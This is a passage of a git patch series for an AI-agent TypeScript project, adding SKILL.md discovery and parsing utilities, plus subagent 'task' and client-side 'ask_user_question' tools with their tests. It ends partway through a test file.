+import { parseSkillFrontmatter } from "@/lib/skills/parseSkillFrontmatter";
+import { frontmatterToOptions, type SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Built-in commands that skills cannot shadow. Skills with these names
+ * would be unreachable via slash command, so we drop them at discovery.
+ */
+const BUILTIN_COMMANDS = ["model", "resume", "new"];
+
+/**
+ * Scan a list of directories for skills. Each directory is expected to
+ * contain one subdirectory per skill, with a SKILL.md (or skill.md)
+ * inside. Returns metadata for everything discoverable; silently skips
+ * non-directories, missing files, malformed frontmatter, and names that
+ * shadow built-in slash commands.
+ *
+ * Dedupes by name (case-insensitive); first-wins across directories so
+ * callers can list project skills before global skills and have project
+ * shadow global.
+ *
+ * @param sandbox - Connected sandbox for file ops.
+ * @param directories - Absolute paths to scan.
+ */
+export async function discoverSkills(
+  sandbox: Sandbox,
+  directories: string[],
+): Promise<SkillMetadata[]> {
+  const skills: SkillMetadata[] = [];
+  const seen = new Set<string>();
+
+  for (const dir of directories) {
+    try {
+      const stat = await sandbox.stat(dir);
+      if (!stat.isDirectory()) continue;
+    } catch {
+      continue; // directory doesn't exist
+    }
+
+    let entries;
+    try {
+      entries = await sandbox.readdir(dir, { withFileTypes: true });
+    } catch {
+      continue;
+    }
+
+    for (const entry of entries) {
+      if (!entry.isDirectory()) continue;
+
+      const skillDir = path.join(dir, entry.name);
+      const skillFile = await findSkillFile(sandbox, skillDir);
+      if (!skillFile) continue;
+
+      let content: string;
+      try {
+        content = await sandbox.readFile(skillFile, "utf-8");
+      } catch {
+        continue;
+      }
+
+      const parsed = parseSkillFrontmatter(content);
+      if (!parsed.success) continue;
+      const frontmatter = parsed.data;
+
+      if (BUILTIN_COMMANDS.includes(frontmatter.name.toLowerCase())) {
+        console.warn(
+          `[discoverSkills] Skipping "${frontmatter.name}" in ${skillDir} — name shadows built-in /${frontmatter.name}`,
+        );
+        continue;
+      }
+
+      const normalized = frontmatter.name.toLowerCase();
+      if (seen.has(normalized)) continue;
+      seen.add(normalized);
+
+      skills.push({
+        name: frontmatter.name,
+        description: frontmatter.description,
+        path: skillDir,
+        filename: path.basename(skillFile),
+        options: frontmatterToOptions(frontmatter),
+      });
+    }
+  }
+
+  return skills;
+}
diff --git a/lib/skills/extractSkillBody.ts b/lib/skills/extractSkillBody.ts
new file mode 100644
index 000000000..d1dcb3f5e
--- /dev/null
+++ b/lib/skills/extractSkillBody.ts
@@ -0,0 +1,14 @@
+/**
+ * Strip the YAML frontmatter from a SKILL.md file and return just the
+ * markdown body. Returns the entire content (trimmed) when no
+ * frontmatter is present.
+ *
+ * @param fileContent - Full file content read from sandbox.
+ */
+export function extractSkillBody(fileContent: string): string {
+  const match = fileContent.match(/^---\r?\n[\s\S]*?\r?\n---\r?\n?/);
+  if (match) {
+    return fileContent.slice(match[0].length).trim();
+  }
+  return fileContent.trim();
+}
diff --git a/lib/skills/findSkillFile.ts b/lib/skills/findSkillFile.ts
new file mode 100644
index 000000000..a81b9e415
--- /dev/null
+++ b/lib/skills/findSkillFile.ts
@@ -0,0 +1,33 @@
+import * as path from "path";
+import type { Sandbox } from "@/lib/sandbox/interface";
+
+/**
+ * Locate the SKILL.md file inside a candidate skill directory. Prefers
+ * uppercase `SKILL.md` (the project convention) but falls back to
+ * lowercase `skill.md` for skills that ship the lowercase name. Returns
+ * `null` when neither file exists so callers can skip the entry.
+ *
+ * Probes via `sandbox.access` (which throws on missing) rather than
+ * `readdir` so we don't pay the cost of listing a directory whose
+ * contents we don't otherwise need.
+ *
+ * @param sandbox - Connected sandbox handle.
+ * @param skillDir - Absolute path to the candidate skill directory.
+ */
+export async function findSkillFile(sandbox: Sandbox, skillDir: string): Promise<string | null> {
+  const uppercase = path.join(skillDir, "SKILL.md");
+  const lowercase = path.join(skillDir, "skill.md");
+
+  try {
+    await sandbox.access(uppercase);
+    return uppercase;
+  } catch {
+    // try lowercase
+  }
+  try {
+    await sandbox.access(lowercase);
+    return lowercase;
+  } catch {
+    return null;
+  }
+}
diff --git a/lib/skills/getGlobalSkillsDirectory.ts b/lib/skills/getGlobalSkillsDirectory.ts
new file mode 100644
index 000000000..788a6dfc7
--- /dev/null
+++ b/lib/skills/getGlobalSkillsDirectory.ts
@@ -0,0 +1,14 @@
+import * as path from "path";
+
+/**
+ * Resolve the absolute path to the global skills directory under a
+ * given `$HOME`. This is where `installSessionGlobalSkills` lays down
+ * skills at sandbox provisioning time via `npx skills add ... -g`
+ * (today: `recoup-api`, `artist-workspace`).
+ *
+ * @param homeDirectory - The sandbox's resolved $HOME (e.g.
+ *   `/home/vercel-sandbox`, or `/root` on the open-agents base image).
+ */
+export function getGlobalSkillsDirectory(homeDirectory: string): string {
+  return path.posix.join(homeDirectory, ".agents", "skills");
+}
diff --git a/lib/skills/getSandboxSkillDirectories.ts b/lib/skills/getSandboxSkillDirectories.ts
new file mode 100644
index 000000000..81645ea46
--- /dev/null
+++ b/lib/skills/getSandboxSkillDirectories.ts
@@ -0,0 +1,16 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { resolveSandboxHomeDirectory } from "@/lib/sandbox/resolveSandboxHomeDirectory";
+import { getGlobalSkillsDirectory } from "@/lib/skills/getGlobalSkillsDirectory";
+
+/**
+ * Resolve the directory list to scan when discovering skills for a
+ * sandbox. Currently just one path — `${HOME}/.agents/skills/` —
+ * because all skills are provisioned globally at sandbox startup via
+ * `installSessionGlobalSkills` rather than bundled into the cloned repo.
+ *
+ * @param sandbox - Connected sandbox handle.
+ */
+export async function getSandboxSkillDirectories(sandbox: Sandbox): Promise<string[]> {
+  const homeDirectory = await resolveSandboxHomeDirectory(sandbox);
+  return [getGlobalSkillsDirectory(homeDirectory)];
+}
diff --git a/lib/skills/getSkills.ts b/lib/skills/getSkills.ts
new file mode 100644
index 000000000..d2d29ed7d
--- /dev/null
+++ b/lib/skills/getSkills.ts
@@ -0,0 +1,22 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+import type { SkillMetadata } from "@/lib/skills/skillTypes";
+
+/**
+ * Read the discovered skill catalog out of the agent's
+ * `experimental_context`. The catalog is populated by the chat handler
+ * via `discoverSkills(sandbox, getSandboxSkillDirectories(sandbox))`
+ * before workflow start, then threaded through as
+ * `AgentContext.skills`. Returns `[]` when the context shape is wrong
+ * or no skills were discovered.
+ *
+ * Lives in its own file so consumers (the `skill` tool today, future
+ * skill-aware system prompts tomorrow) share one accessor instead of
+ * each reimplementing the context-cast.
+ *
+ * @param experimental_context - Opaque context object passed by AI SDK to tool execute.
+ */
+export function getSkills(experimental_context: unknown): SkillMetadata[] {
+  if (!isAgentContext(experimental_context)) return [];
+  const ctx = experimental_context as { skills?: SkillMetadata[] };
+  return ctx.skills ?? [];
+}
diff --git a/lib/skills/injectSkillDirectory.ts b/lib/skills/injectSkillDirectory.ts
new file mode 100644
index 000000000..cf4bf58d5
--- /dev/null
+++ b/lib/skills/injectSkillDirectory.ts
@@ -0,0 +1,11 @@
+/**
+ * Prepend a `Skill directory: <absolute-path>` header to a skill body
+ * so the model can construct full paths to scripts and resources living
+ * alongside SKILL.md (e.g. `${skillDir}/scripts/check.sh`).
+ *
+ * @param body - Skill body (after frontmatter strip).
+ * @param skillDir - Absolute sandbox path to the skill directory.
+ */
+export function injectSkillDirectory(body: string, skillDir: string): string {
+  return `Skill directory: ${skillDir}\n\n${body}`;
+}
diff --git a/lib/skills/parseSkillFrontmatter.ts b/lib/skills/parseSkillFrontmatter.ts
new file mode 100644
index 000000000..3d2888d76
--- /dev/null
+++ b/lib/skills/parseSkillFrontmatter.ts
@@ -0,0 +1,52 @@
+import { skillFrontmatterSchema } from "@/lib/skills/skillTypes";
+
+/**
+ * Parse YAML frontmatter from SKILL.md content. Returns the Zod
+ * `safeParse` shape so callers can branch cleanly on success.
+ *
+ * Intentionally a hand-rolled subset of YAML (one-line `key: value`
+ * with `"…"` / `'…'` quoting + unquoted `true`/`false`) so we don't
+ * pull a YAML dep just to read a 3-line block.
+ *
+ * @param content - Full SKILL.md content (including the leading `---`).
+ */
+export function parseSkillFrontmatter(
+  content: string,
+): ReturnType<typeof skillFrontmatterSchema.safeParse> {
+  const match = content.match(/^---\r?\n([\s\S]*?)\r?\n---/);
+  if (!match?.[1]) {
+    return {
+      success: false,
+      error: new Error("No frontmatter found") as never,
+    };
+  }
+
+  const yaml = match[1];
+  const parsed: Record<string, unknown> = {};
+
+  for (const line of yaml.split("\n")) {
+    const trimmed = line.trim();
+    if (!trimmed || trimmed.startsWith("#")) continue;
+
+    const colonIndex = trimmed.indexOf(":");
+    if (colonIndex === -1) continue;
+
+    const key = trimmed.slice(0, colonIndex).trim();
+    // Only split on the first colon so values like URLs stay intact.
+    let value: string | boolean = trimmed.slice(colonIndex + 1).trim();
+
+    if (value.startsWith('"') && value.endsWith('"')) {
+      value = value.slice(1, -1).replace(/\\"/g, '"');
+    } else if (value.startsWith("'") && value.endsWith("'")) {
+      value = value.slice(1, -1).replace(/\\'/g, "'");
+    } else if (value === "true") {
+      value = true;
+    } else if (value === "false") {
+      value = false;
+    }
+
+    parsed[key] = value;
+  }
+
+  return skillFrontmatterSchema.safeParse(parsed);
+}
diff --git a/lib/skills/skillTypes.ts b/lib/skills/skillTypes.ts
new file mode 100644
index 000000000..77fffd055
--- /dev/null
+++ b/lib/skills/skillTypes.ts
@@ -0,0 +1,76 @@
+import { z } from "zod";
+
+/**
+ * Zod schema for skill frontmatter YAML validation. Defines the
+ * expected structure at the top of SKILL.md files.
+ */
+export const skillFrontmatterSchema = z.object({
+  name: z.string().min(1, "Skill name cannot be empty").describe("Unique name of the skill"),
+  description: z
+    .string()
+    .min(1, "Skill description cannot be empty")
+    .describe("Short description for the agent"),
+  version: z.string().optional().describe("Skill version"),
+  "disable-model-invocation": z
+    .boolean()
+    .optional()
+    .describe("If true, the model cannot invoke this skill automatically"),
+  "user-invocable": z
+    .boolean()
+    .optional()
+    .describe("If false, users cannot invoke this skill via slash command"),
+  "allowed-tools": z
+    .string()
+    .optional()
+    .describe("Comma-separated list of allowed tools when skill is active"),
+  context: z.enum(["fork"]).optional().describe("Execution context for the skill"),
+  agent: z.string().optional().describe("Agent type to use for execution"),
+});
+
+export type SkillFrontmatter = z.infer<typeof skillFrontmatterSchema>;
+
+/**
+ * Normalized skill options derived from frontmatter — camelCase fields,
+ * comma-separated lists pre-split.
+ */
+export interface SkillOptions {
+  disableModelInvocation?: boolean;
+  userInvocable?: boolean;
+  allowedTools?: string[];
+  context?: "fork";
+  agent?: string;
+}
+
+/**
+ * Skill metadata stored on `AgentContext.skills`. Contains only what
+ * `skillTool` needs at invocation time — the SKILL.md body is loaded
+ * lazily.
+ */
+export interface SkillMetadata {
+  /** Unique name of the skill. */
+  name: string;
+  /** Short description for the agent. */
+  description: string;
+  /** Absolute sandbox path to the skill directory. */
+  path: string;
+  /** Filename of the skill file (`SKILL.md` or `skill.md`). */
+  filename: string;
+  /** Skill options from frontmatter. */
+  options: SkillOptions;
+}
+
+/**
+ * Normalize parsed frontmatter to {@link SkillOptions}.
+ */
+export function frontmatterToOptions(frontmatter: SkillFrontmatter): SkillOptions {
+  return {
+    disableModelInvocation: frontmatter["disable-model-invocation"],
+    userInvocable: frontmatter["user-invocable"],
+    allowedTools: frontmatter["allowed-tools"]
+      ?.split(",")
+      .map(t => t.trim())
+      .filter(Boolean),
+    context: frontmatter.context,
+    agent: frontmatter.agent,
+  };
+}
diff --git a/lib/skills/substituteArguments.ts b/lib/skills/substituteArguments.ts
new file mode 100644
index 000000000..44500bc58
--- /dev/null
+++ b/lib/skills/substituteArguments.ts
@@ -0,0 +1,14 @@
+/**
+ * Replace all occurrences of `$ARGUMENTS` in a skill body with the
+ * provided args string (or empty string when no args were passed).
+ *
+ * Used by `skillTool` after loading SKILL.md so slash-command-style
+ * invocations like `/commit -m "fix"` thread the arg suffix through to
+ * the skill's body text.
+ *
+ * @param body - Skill body (markdown after frontmatter).
+ * @param args - Optional arguments passed by the model.
+ */
+export function substituteArguments(body: string, args?: string): string {
+  return body.replace(/\$ARGUMENTS/g, args ?? "");
+}

From b36aa5846115cc30f18bc317aba2fca34fa431b5 Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 17:45:47 -0500
Subject: [PATCH 06/10] feat(chat-workflow): port task + ask_user_question
 composite tools (PR 7) (#589)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port task + ask_user_question composite tools (PR 7)

Completes the open-agents tool surface. The agent now has all 11 tools.

**ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) —
client-side tool with NO server execute. Schema mirrors open-agents
verbatim (questions array, options with label/description, multiSelect
flag, max 12-char header). streamText halts after emitting the tool-
call because there's no result to feed back; the chat UI renders the
question component, collects answers, and submits them in the next
workflow request's messages array. No WDK pause/resume hook needed.

**task** (lib/agent/tools/taskTool.ts) — slim port of open-agents'
multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub-
`streamText` loop with a curated subagent tool set (`read, write,
edit, grep, glob, bash`) matching open-agents' `executor` subagent.

The subagent tool set deliberately EXCLUDES:
- task (recursion guard — open-agents' three subagent types
  executor/explorer/design all explicitly omit task too; subagents
  are leaves of the agent tree)
- ask_user_question, skill, todo_write, web_fetch (parity with
  open-agents subagent curation; subagents run autonomously, don't
  plan from scratch, don't make web calls, don't load further skills)

AgentContext gains `modelId?: string` so the subagent can use the
same model as its parent. Handler populates it from chat.model_id
or the platform default.

buildAgentTools registers both new tools unconditionally (skill stays
conditional on a non-empty catalog).

Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output)
directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165
does. askUserQuestionTool uses the direct signature.

Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools
+ AgentContext updates. Full suite 3075/3075 pass, lint clean,
production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(task-tool): provide non-empty subagent prompt

The subagent's streamText was invoked with messages: [] and only a
system prompt, so the AI SDK recorded zero steps and threw
NoOutputGeneratedError — surfaced to the parent as "Subagent failed:
No output generated. Check the stream for errors."

Pass an explicit user-side trigger prompt, mirroring open-agents'
task tool. Adds a regression test that asserts streamText receives
either a non-empty prompt or non-empty messages.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS)

Address PR review feedback:

- SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts
  (one exported function per file).
- KISS: open-agents' AgentContext type does not have modelId — it uses
  model: LanguageModel / subagentModel?: LanguageModel. api can't follow
  that exact shape because agentContext is part of a durable Vercel
  Workflow input and LanguageModel objects aren't JSON-serializable.
  Instead of inventing modelId on AgentContext, hardcode a default
  subagent model id in taskTool. A subagentModelId override field can
  be added if/when a real consumer needs it.

Also format-fixes askUserQuestionTool.ts toModelOutput arrow
(parentheses around single param flagged by prettier in CI).

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent): align AgentContext + model resolution with open-agents

Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent
inherits the parent's model (rather than the previous hardcoded
SUBAGENT_MODEL_ID):

- AgentContext gains `model: LanguageModel` (required) and
  `subagentModel?: LanguageModel`, mirroring open-agents.
- Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">
  for the workflow input shape, since LanguageModel instances aren't
  JSON-serializable and can't ride durable Vercel Workflow inputs.
- runAgentStep constructs `callModel = gateway(input.modelId)` once
  per step and merges it into experimental_context — same pattern as
  open-agents' prepareCall in open-harness-agent.ts.
- New getMainModel / getSubagentModel helpers (SRP, one per file)
  mirror open-agents' utility functions: getSubagentModel returns
  `ctx.subagentModel ?? ctx.model`.
- taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls
  getSubagentModel(experimental_context, "task") instead — subagent
  now defaults to the same model the parent is running.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 app/lib/workflows/runAgentStep.ts             |  25 ++-
 app/lib/workflows/runAgentWorkflow.ts         |   9 +-
 lib/agent/__tests__/buildAgentTools.test.ts   |  26 ++--
 lib/agent/buildAgentTools.ts                  |  27 +++-
 lib/agent/tools/AgentContext.ts               |  35 ++++-
 .../__tests__/askUserQuestionTool.test.ts     | 111 +++++++++++++
 lib/agent/tools/__tests__/taskTool.test.ts    | 146 ++++++++++++++++++
 lib/agent/tools/askUserQuestionTool.ts        |  90 +++++++++++
 lib/agent/tools/buildSubagentTools.ts         |  32 ++++
 lib/agent/tools/getMainModel.ts               |  26 ++++
 lib/agent/tools/getSubagentModel.ts           |  24 +++
 lib/agent/tools/taskTool.ts                   | 122 +++++++++++++++
 12 files changed, 644 insertions(+), 29 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/askUserQuestionTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/taskTool.test.ts
 create mode 100644 lib/agent/tools/askUserQuestionTool.ts
 create mode 100644 lib/agent/tools/buildSubagentTools.ts
 create mode 100644 lib/agent/tools/getMainModel.ts
 create mode 100644 lib/agent/tools/getSubagentModel.ts
 create mode 100644 lib/agent/tools/taskTool.ts

diff --git a/app/lib/workflows/runAgentStep.ts b/app/lib/workflows/runAgentStep.ts
index 704035c64..b487285dc 100644
--- a/app/lib/workflows/runAgentStep.ts
+++ b/app/lib/workflows/runAgentStep.ts
@@ -3,17 +3,21 @@ import { gateway } from "@ai-sdk/gateway";
 import { agentCustomInstructions } from "@/lib/chat/agentCustomInstructions";
 import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
-import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+import type { AgentContext, DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentStepInput = {
   messages: UIMessage[];
   modelId: string;
   writable: WritableStream<UIMessageChunk>;
   /**
-   * Threaded into `streamText`'s `experimental_context` so each tool's
-   * `execute` callback can read the sandbox state + per-prompt context.
+   * The JSON-serializable agent context that survives the durable
+   * workflow input. `runAgentStep` widens it into a full `AgentContext`
+   * by attaching `model` (and optionally `subagentModel`) before
+   * threading into `streamText`'s `experimental_context`. Mirrors
+   * open-agents' prepareCall pattern, where the constructed callModel
+   * is added to `experimental_context` right before each model call.
    */
-  agentContext: AgentContext;
+  agentContext: DurableAgentContext;
 };
 
 /**
@@ -43,13 +47,22 @@ export async function runAgentStep(input: RunAgentStepInput): Promise<{ finishRe
 
   const modelMessages = convertToModelMessages(input.messages);
   const tools = buildAgentTools({ skills: input.agentContext.skills });
+  // Construct the model here (not in the workflow input) — LanguageModel
+  // instances aren't JSON-serializable and can't ride durable inputs.
+  // Then attach to AgentContext so tools see the same model the parent
+  // is using, matching open-agents' `prepareCall` pattern.
+  const callModel = gateway(input.modelId);
+  const agentContext: AgentContext = {
+    ...input.agentContext,
+    model: callModel,
+  };
   const result = streamText({
-    model: gateway(input.modelId),
+    model: callModel,
     system: agentCustomInstructions,
     messages: modelMessages,
     tools,
     stopWhen: CHAT_AGENT_STOP_WHEN,
-    experimental_context: input.agentContext,
+    experimental_context: agentContext,
   });
 
   // Acquire the writer once and release in `finally` so a thrown chunk
diff --git a/app/lib/workflows/runAgentWorkflow.ts b/app/lib/workflows/runAgentWorkflow.ts
index ce65b0bb3..3a0965342 100644
--- a/app/lib/workflows/runAgentWorkflow.ts
+++ b/app/lib/workflows/runAgentWorkflow.ts
@@ -1,7 +1,7 @@
 import { getWritable } from "workflow";
 import type { UIMessage, UIMessageChunk } from "ai";
 import { runAgentStep } from "@/app/lib/workflows/runAgentStep";
-import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+import type { DurableAgentContext } from "@/lib/agent/tools/AgentContext";
 
 export type RunAgentWorkflowInput = {
   messages: UIMessage[];
@@ -9,10 +9,11 @@ export type RunAgentWorkflowInput = {
   sessionId: string;
   modelId: string;
   /**
-   * Threaded into `streamText`'s `experimental_context` so tools (bash et al.)
-   * can read sandbox state + per-prompt Recoup creds.
+   * JSON-serializable subset of AgentContext that survives the durable
+   * workflow input. `runAgentStep` attaches the constructed `model`
+   * before threading into `streamText`'s `experimental_context`.
    */
-  agentContext: AgentContext;
+  agentContext: DurableAgentContext;
 };
 
 /**
diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index fb5d99a5a..e684818f2 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,7 +1,7 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
-const BASE_TOOLS = [
+const ALWAYS_PRESENT = [
   "bash",
   "read",
   "write",
@@ -10,18 +10,20 @@ const BASE_TOOLS = [
   "glob",
   "todo_write",
   "web_fetch",
+  "task",
+  "ask_user_question",
 ] as const;
 
 describe("buildAgentTools", () => {
-  it("returns the 8 leaf tools by default (no skill registered when skills list is empty)", () => {
+  it("registers the 10 always-on tools by default", () => {
     const tools = buildAgentTools();
-    for (const name of BASE_TOOLS) {
+    for (const name of ALWAYS_PRESENT) {
       expect(tools).toHaveProperty(name);
     }
     expect(tools).not.toHaveProperty("skill");
   });
 
-  it("registers the skill tool when a non-empty skill catalog is provided", () => {
+  it("conditionally adds `skill` when a non-empty skill catalog is provided", () => {
     const tools = buildAgentTools({
       skills: [
         {
@@ -34,17 +36,17 @@ describe("buildAgentTools", () => {
       ],
     });
     expect(tools).toHaveProperty("skill");
-    for (const name of BASE_TOOLS) {
+    for (const name of ALWAYS_PRESENT) {
       expect(tools).toHaveProperty(name);
     }
   });
 
-  it("omits the skill tool when an empty array is passed", () => {
+  it("omits `skill` when an empty array is passed", () => {
     const tools = buildAgentTools({ skills: [] });
     expect(tools).not.toHaveProperty("skill");
   });
 
-  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+  it("each tool exposes the AI SDK shape (description + inputSchema)", () => {
     const tools = buildAgentTools({
       skills: [
         {
@@ -55,12 +57,16 @@ describe("buildAgentTools", () => {
           options: {},
         },
       ],
-    }) as Record<string, { description?: unknown; inputSchema?: unknown; execute?: unknown }>;
-    for (const name of [...BASE_TOOLS, "skill"]) {
+    }) as Record<string, { description?: unknown; inputSchema?: unknown }>;
+    for (const name of [...ALWAYS_PRESENT, "skill"]) {
       const t = tools[name]!;
       expect(typeof t.description).toBe("string");
       expect(t.inputSchema).toBeDefined();
-      expect(typeof t.execute).toBe("function");
     }
   });
+
+  it("`ask_user_question` has no server execute (client-side tool)", () => {
+    const tools = buildAgentTools() as Record<string, { execute?: unknown }>;
+    expect(tools.ask_user_question?.execute).toBeUndefined();
+  });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index 393b32889..728334b11 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -1,3 +1,4 @@
+import { askUserQuestionTool } from "@/lib/agent/tools/askUserQuestionTool";
 import { bashTool } from "@/lib/agent/tools/bashTool";
 import { readFileTool } from "@/lib/agent/tools/readFileTool";
 import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
@@ -7,6 +8,7 @@ import { globTool } from "@/lib/agent/tools/globTool";
 import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
 import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 import { skillTool } from "@/lib/agent/tools/skillTool";
+import { taskTool } from "@/lib/agent/tools/taskTool";
 import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
@@ -14,13 +16,24 @@ import type { SkillMetadata } from "@/lib/skills/skillTypes";
  * Each tool reads its sandbox handle + per-prompt context from
  * `experimental_context` at execute time — the factory is otherwise stateless.
  *
- * Currently ships 9 tools:
- *   - 6 file/shell: bash, read, write, edit, grep, glob
- *   - todo_write (planning surface; stateless, echoes the list back)
+ * Currently ships 11 tools:
+ *
+ * Sandbox / file ops (6):
+ *   - bash, read, write, edit, grep, glob
+ *
+ * Composite (2):
+ *   - task — delegate focused work to a subagent (sub-streamText loop;
+ *     subagent has only read/write/edit/grep/glob/bash to prevent
+ *     recursion via task itself, matching open-agents' subagent
+ *     curation)
+ *   - skill — load a project-level skill's SKILL.md (only registered
+ *     when the sandbox has skills available)
+ *
+ * Client-side / planning (3):
+ *   - todo_write (stateless planning surface)
  *   - web_fetch (HTTP via curl inside the sandbox)
- *   - skill (load a project-level skill's SKILL.md; only registered when the
- *     sandbox has skills available, so models without any skill catalog
- *     don't see the tool at all and never call it speculatively)
+ *   - ask_user_question (no server execute; chat UI fulfills it and
+ *     the next workflow turn sees the answer in messages)
  *
  * @param options.skills - Discovered skill catalog. When empty / undefined,
  *   `skill` is omitted from the tool record so the model doesn't see it.
@@ -36,6 +49,8 @@ export function buildAgentTools(options: { skills?: SkillMetadata[] } = {}) {
     glob: globTool,
     todo_write: todoWriteTool,
     web_fetch: webFetchTool,
+    task: taskTool,
+    ask_user_question: askUserQuestionTool,
     ...(hasSkills ? { skill: skillTool } : {}),
   };
 }
diff --git a/lib/agent/tools/AgentContext.ts b/lib/agent/tools/AgentContext.ts
index acb455164..7cdcf24a4 100644
--- a/lib/agent/tools/AgentContext.ts
+++ b/lib/agent/tools/AgentContext.ts
@@ -1,11 +1,20 @@
+import type { LanguageModel } from "ai";
 import type { VercelState } from "@/lib/sandbox/vercel/state";
 import type { SkillMetadata } from "@/lib/skills/skillTypes";
 
 /**
  * Per-tool-call context threaded into the agent via `streamText`'s
- * `experimental_context`. Mirrors the open-agents `AgentContext` shape
- * (subset — slim PR 4 ports only the `bash` tool, so context only needs
- * what `bash` reads).
+ * `experimental_context`. Mirrors the open-agents `AgentContext`
+ * interface (`packages/agent/types.ts`) one-for-one. The only
+ * deviation is structural: `model` / `subagentModel` are
+ * `LanguageModel` instances that cannot ride through a durable
+ * Vercel Workflow input, so `runAgentStep` constructs them per-step
+ * (via `gateway(input.modelId)`) right before calling `streamText`.
+ *
+ * The durable workflow-input shape is `DurableAgentContext` below —
+ * `runAgentStep` widens that into a full `AgentContext` by attaching
+ * the constructed model(s) before `experimental_context` is observed
+ * by any tool.
  *
  * Why no `recoupAccessToken` field? A short-lived per-prompt credential
  * would let sandbox tools (`skill`, the eventual `recoup-api` skill) call
@@ -42,4 +51,24 @@ export type AgentContext = {
    * Empty / undefined when the sandbox has no `skills/` directory.
    */
   skills?: SkillMetadata[];
+  /**
+   * Main agent's language model. Tools read this via `getMainModel`.
+   * Set per-step by `runAgentStep` (not part of the durable input).
+   * Mirrors open-agents' `AgentContext.model: LanguageModel`.
+   */
+  model: LanguageModel;
+  /**
+   * Optional subagent override. If unset, `getSubagentModel` falls
+   * back to `model`. Mirrors open-agents'
+   * `AgentContext.subagentModel?: LanguageModel`.
+   */
+  subagentModel?: LanguageModel;
 };
+
+/**
+ * The JSON-serializable subset of `AgentContext` that survives a
+ * Vercel Workflow durable input (`start(runAgentWorkflow, [...])`).
+ * `LanguageModel` instances aren't serializable, so they're stripped
+ * here and re-attached inside the step.
+ */
+export type DurableAgentContext = Omit<AgentContext, "model" | "subagentModel">;
diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
new file mode 100644
index 000000000..ee55e6305
--- /dev/null
+++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts
@@ -0,0 +1,111 @@
+import { describe, it, expect } from "vitest";
+import {
+  askUserQuestionTool,
+  askUserQuestionInputSchema,
+} from "@/lib/agent/tools/askUserQuestionTool";
+
+describe("askUserQuestionInputSchema", () => {
+  it("accepts a valid single-question payload", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "Which model do you want?",
+          header: "Model",
+          options: [
+            { label: "Haiku", description: "Fast" },
+            { label: "Sonnet", description: "Balanced" },
+          ],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(true);
+  });
+
+  it("rejects an empty questions list", () => {
+    const result = askUserQuestionInputSchema.safeParse({ questions: [] });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects more than 4 questions per payload", () => {
+    const q = {
+      question: "x?",
+      header: "h",
+      options: [
+        { label: "a", description: "a" },
+        { label: "b", description: "b" },
+      ],
+      multiSelect: false,
+    };
+    const result = askUserQuestionInputSchema.safeParse({ questions: [q, q, q, q, q] });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects a question with fewer than 2 options", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "x?",
+          header: "h",
+          options: [{ label: "only", description: "one" }],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(false);
+  });
+
+  it("rejects a header longer than 12 chars", () => {
+    const result = askUserQuestionInputSchema.safeParse({
+      questions: [
+        {
+          question: "x?",
+          header: "this-header-is-way-too-long",
+          options: [
+            { label: "a", description: "a" },
+            { label: "b", description: "b" },
+          ],
+          multiSelect: false,
+        },
+      ],
+    });
+    expect(result.success).toBe(false);
+  });
+});
+
+describe("askUserQuestionTool — server-side wiring", () => {
+  it("has no execute (it's a client-side tool the chat UI fulfills)", () => {
+    expect(askUserQuestionTool.execute).toBeUndefined();
+  });
+});
+
+describe("askUserQuestionTool.toModelOutput", () => {
+  it("returns a generic message when no output is present", () => {
+    expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({
+      type: "text",
+      value: "User did not respond to questions.",
+    });
